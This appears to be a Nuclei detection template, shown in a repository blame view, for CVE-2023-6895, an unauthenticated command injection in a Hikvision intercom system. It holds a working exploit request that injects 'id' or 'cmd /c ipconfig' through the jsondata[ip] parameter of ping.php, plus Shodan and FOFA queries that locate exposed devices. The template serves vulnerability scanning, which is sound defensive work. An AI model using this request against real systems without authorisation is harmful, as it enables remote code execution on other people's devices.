nuclei-templates/http/cves/2023/CVE-2023-6895.yaml

62 lines
2.1 KiB
YAML
Raw Normal View History

2024-02-29 18:07:31 +00:00
id: CVE-2023-6895
info:
name: Hikvision IP ping.php - Command Execution
2024-03-09 15:55:30 +00:00
author: DhiyaneshDk,archer
2024-02-29 18:07:31 +00:00
severity: critical
2024-03-09 15:55:30 +00:00
description: |
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
2024-02-29 18:07:31 +00:00
reference:
2024-02-29 18:15:38 +00:00
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
2024-05-31 19:23:20 +00:00
- https://github.com/tanjiti/sec_profile
- https://github.com/wy876/POC
- https://github.com/xingchennb/POC-
2024-02-29 18:15:38 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
2024-05-31 19:23:20 +00:00
epss-score: 0.89707
epss-percentile: 0.9876
2024-02-29 18:15:38 +00:00
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
2024-02-29 18:07:31 +00:00
metadata:
verified: true
max-request: 2
2024-02-29 18:15:38 +00:00
vendor: hikvision
2024-05-23 21:45:20 +00:00
product: intercom_broadcast_system
2024-05-31 19:23:20 +00:00
shodan-query: http.favicon.hash:"-1830859634"
fofa-query: "icon_hash=\"-1830859634\""
tags: cve,cve2023,hikvision,rce
2024-02-29 18:07:31 +00:00
http:
- method: POST
path:
- "{{BaseURL}}/php/ping.php"
body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
headers:
Content-Type: "application/x-www-form-urlencoded"
2024-02-29 18:07:31 +00:00
payloads:
command:
- 'id'
- 'cmd /c ipconfig'
2024-02-29 18:07:31 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Windows IP"
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
condition: or
2024-02-29 18:07:31 +00:00
2024-02-29 18:15:38 +00:00
- type: word
part: header
2024-02-29 18:15:38 +00:00
words:
- "text/html"
2024-02-29 18:15:38 +00:00
2024-02-29 18:07:31 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100873e667f79525849dce90cee9fef344f9cede1e176a67b4f6918f37d4a23e3b50220576cab131b3b6fe4305ffc0a3f677aeb1778b20ed6ea7df960fabb089bdedafa:922c64590222798bb761d5b6d8e72950